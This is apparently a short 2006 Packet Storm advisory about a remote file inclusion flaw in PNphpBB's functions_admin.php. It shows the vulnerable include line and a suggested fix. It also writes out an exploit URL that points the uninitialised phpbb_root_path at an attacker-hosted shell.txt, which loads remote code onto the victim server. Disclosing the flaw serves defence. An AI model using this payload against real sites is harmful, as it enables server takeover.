PNphpBB.txt

2006-09-26T00:00:00
ID PACKETSTORM:50288
Type packetstorm
Reporter AzzCoder
Modified 2006-09-26T00:00:00

Description

                                        
                                            `Vendor: http://www.pnphpbb.com/  
  
Vulnerable File: includes/functions_admin.php  
  
Vulnerable Code:  
  
//The phpbb_root_path isn't initialize  
  
include_once( $phpbb_root_path . 'includes/functions.' . $phpEx );  
  
Method To Use:  
  
http://www.victim.com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://yourdomain.com/shell.txt?  
  
How To Fix:  
  
Add this code before the include  
  
if ( !defined('IN_PHPBB') )  
{  
die("Hacking attempt");  
}  
`